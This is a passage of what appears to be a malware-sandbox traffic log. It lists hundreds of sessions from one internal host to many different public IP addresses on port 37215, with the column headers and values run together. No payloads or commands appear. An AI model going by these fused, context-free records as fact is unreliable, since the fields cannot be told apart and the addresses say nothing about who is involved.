                                              7694192.168.2.1554664138.26.107.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7695192.168.2.1536080181.219.13.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7696192.168.2.155413694.117.16.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7697192.168.2.1551698181.65.35.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7698192.168.2.153483241.212.67.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7699192.168.2.1555628102.226.196.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7700192.168.2.1554846121.170.103.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7701192.168.2.1552168121.94.208.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7702192.168.2.153542041.135.141.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7703192.168.2.1537710197.117.183.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7704192.168.2.1534934186.206.96.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7705192.168.2.1558284121.152.200.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7706192.168.2.1549400197.247.53.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7707192.168.2.1535898190.103.104.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7708192.168.2.1539334197.74.53.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7709192.168.2.1548418153.175.194.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7710192.168.2.154331876.1.77.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7711192.168.2.1546970186.136.147.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7712192.168.2.1555082121.239.66.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7713192.168.2.155368437.99.132.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7714192.168.2.1543164121.160.34.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7715192.168.2.1556702186.119.23.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7716192.168.2.1553912181.169.246.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7717192.168.2.1547798122.246.20.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7718192.168.2.153866637.204.98.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7719192.168.2.155194031.94.24.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7720192.168.2.1546140190.172.56.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7721192.168.2.1558028138.221.86.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7722192.168.2.1537422138.149.127.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7723192.168.2.1533048122.109.201.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7724192.168.2.1553766190.39.134.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7725192.168.2.1549670102.110.143.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7726192.168.2.1540276122.194.235.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7727192.168.2.154748645.161.16.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7728192.168.2.1556602197.207.213.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7729192.168.2.1557964156.110.182.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7730192.168.2.1534382122.11.47.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7731192.168.2.1558052102.209.210.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7732192.168.2.1559830186.121.203.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7733192.168.2.1560130181.116.85.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7734192.168.2.1534412197.211.171.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7735192.168.2.1553330186.93.48.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7736192.168.2.1538660181.192.42.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7737192.168.2.155253431.40.248.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7738192.168.2.1553040197.199.156.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7739192.168.2.1535914138.71.172.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7740192.168.2.153951441.113.122.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7741192.168.2.1559636122.110.169.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7742192.168.2.1536366197.0.141.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7743192.168.2.154258445.240.214.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7744192.168.2.1551086122.170.254.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7745192.168.2.155885039.41.214.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7746192.168.2.1551070157.96.206.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7747192.168.2.1550882186.6.232.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7748192.168.2.1533606121.104.68.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7749192.168.2.1546962181.121.255.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7750192.168.2.154679245.216.202.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7751192.168.2.1542886102.247.152.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7752192.168.2.155970437.113.14.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7753192.168.2.154016237.156.63.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7754192.168.2.1557520190.81.234.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7755192.168.2.1547916157.170.85.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7756192.168.2.153292441.12.122.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7757192.168.2.154030245.152.252.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7758192.168.2.1542284197.77.138.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7759192.168.2.1543326156.102.46.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7760192.168.2.1557700190.4.242.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7761192.168.2.1559746190.240.98.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7762192.168.2.1551876186.14.213.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7763192.168.2.153747645.89.121.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7764192.168.2.1551588190.114.78.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7765192.168.2.1552172138.245.204.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7766192.168.2.155724637.42.54.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7767192.168.2.1560046157.146.132.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7768192.168.2.1533532190.108.1.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7769192.168.2.154659241.13.88.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7770192.168.2.1559730181.159.146.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7771192.168.2.1538384222.38.84.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7772192.168.2.1536876156.108.7.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7773192.168.2.1538140181.245.12.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7774192.168.2.1544916186.56.39.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7775192.168.2.1550256181.175.187.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7776192.168.2.155003482.58.237.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7777192.168.2.1548666121.233.114.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7778192.168.2.156066645.26.98.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7779192.168.2.155199294.223.207.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7780192.168.2.1537394222.105.65.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7781192.168.2.1559258122.79.58.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7782192.168.2.1558500222.132.221.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7783192.168.2.1538214190.206.28.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7784192.168.2.155247894.24.139.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7785192.168.2.155343494.170.227.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7786192.168.2.1543234222.201.120.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7787192.168.2.15353708.132.85.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7788192.168.2.1534010156.166.205.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7789192.168.2.155460241.108.7.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7790192.168.2.1551258222.45.50.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7791192.168.2.1543852181.30.89.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7792192.168.2.1536246132.20.8.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7793192.168.2.1548496222.18.225.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7794192.168.2.1558140157.84.8.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7795192.168.2.1536010174.170.24.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7796192.168.2.1556218222.11.65.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7797192.168.2.1534390157.34.86.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7798192.168.2.156054441.187.27.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7799192.168.2.1546684197.242.5.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7800192.168.2.1546136102.110.248.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7801192.168.2.1536534197.28.115.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7802192.168.2.1543730121.6.213.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7803192.168.2.1550868190.30.0.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7804192.168.2.155934041.49.58.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7805192.168.2.1550692122.251.247.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7806192.168.2.1551286138.109.48.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7807192.168.2.1536480102.109.157.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7808192.168.2.1542400121.141.53.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7809192.168.2.1550546102.139.168.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7810192.168.2.154185031.127.94.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7811192.168.2.155469094.124.229.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7812192.168.2.154590437.7.89.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7813192.168.2.155464831.18.141.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7814192.168.2.1547890222.85.140.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7815192.168.2.155811494.29.173.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7816192.168.2.1538248157.61.208.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7817192.168.2.1560090223.141.28.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7818192.168.2.153327831.28.69.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7819192.168.2.1542222102.169.82.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7820192.168.2.153830237.52.248.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7821192.168.2.1555996181.245.228.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7822192.168.2.154605637.248.37.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7823192.168.2.1551332156.81.30.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7824192.168.2.1553008190.84.228.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7825192.168.2.1545944186.185.3.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7826192.168.2.1554176122.127.97.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7827192.168.2.1555552181.226.254.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7828192.168.2.1558042156.220.101.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7829192.168.2.1557476118.156.9.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7830192.168.2.1537954222.161.74.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7831192.168.2.1552796121.98.100.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7832192.168.2.1539826186.185.113.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7833192.168.2.1541884190.245.84.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7834192.168.2.1557876190.167.66.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7835192.168.2.154967494.207.93.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7836192.168.2.1540298186.246.119.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7837192.168.2.1553848222.74.2.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7838192.168.2.155624894.84.216.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7839192.168.2.1533816197.88.93.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7840192.168.2.1553402156.233.221.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7841192.168.2.155830241.219.149.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7842192.168.2.1546840157.228.32.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7843192.168.2.1560242102.31.244.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7844192.168.2.1557568122.110.9.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7845192.168.2.155352841.226.180.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7846192.168.2.1545938102.107.119.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7847192.168.2.1533494186.188.74.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7848192.168.2.1534910157.30.228.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7849192.168.2.1541560181.90.217.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7850192.168.2.155903641.204.199.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7851192.168.2.1554620190.173.227.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7852192.168.2.154099094.158.1.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7853192.168.2.153571237.66.174.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7854192.168.2.153776877.66.138.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7855192.168.2.1535010138.202.175.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7856192.168.2.154110045.203.66.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7857192.168.2.1539196121.157.72.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7858192.168.2.1555146121.7.72.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7859192.168.2.1533432156.66.136.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7860192.168.2.1533880186.119.208.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7861192.168.2.154307045.164.109.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7862192.168.2.1545760121.214.138.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7863192.168.2.1536312102.186.74.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7864192.168.2.154757837.110.209.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7865192.168.2.154481031.41.57.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7866192.168.2.1533438186.16.124.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7867192.168.2.153353231.51.135.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7868192.168.2.153630041.242.253.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7869192.168.2.155714631.122.160.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7870192.168.2.153986431.169.101.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7871192.168.2.1546958102.190.183.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7872192.168.2.1548610157.83.24.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7873192.168.2.1539654190.159.37.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7874192.168.2.154313631.107.35.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7875192.168.2.153815245.174.184.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7876192.168.2.1534674222.178.69.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7877192.168.2.1539312190.251.151.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7878192.168.2.1557538181.80.4.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7879192.168.2.1536084186.242.133.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7880192.168.2.153473241.28.229.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7881192.168.2.1554172122.220.214.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7882192.168.2.154677045.53.19.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7883192.168.2.155988294.80.10.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7884192.168.2.154686631.247.117.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7885192.168.2.1551452186.252.179.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7886192.168.2.1556208197.95.144.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7887192.168.2.155502431.110.174.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7888192.168.2.1546402181.37.164.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7889192.168.2.1533212197.59.27.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7890192.168.2.1535910186.209.122.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7891192.168.2.1555118197.63.24.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7892192.168.2.1549242138.27.72.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7893192.168.2.1540388197.195.60.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7894192.168.2.1544300197.195.132.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7895192.168.2.1541022102.90.185.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7896192.168.2.1553694186.113.70.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7897192.168.2.1555948156.217.202.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7898192.168.2.1537146186.163.80.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7899192.168.2.1537730156.192.40.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7900192.168.2.1554288222.242.86.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7901192.168.2.1552144222.87.133.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7902192.168.2.153699037.165.24.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7903192.168.2.1544358186.25.111.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7904192.168.2.154947637.242.61.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7905192.168.2.1536826138.184.211.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7906192.168.2.1543116181.147.104.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7907192.168.2.1546878102.109.112.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7908192.168.2.1550272186.252.166.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7909192.168.2.155519094.84.41.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7910192.168.2.1533580186.64.103.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7911192.168.2.154014881.157.108.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7912192.168.2.1539020102.174.138.23637215
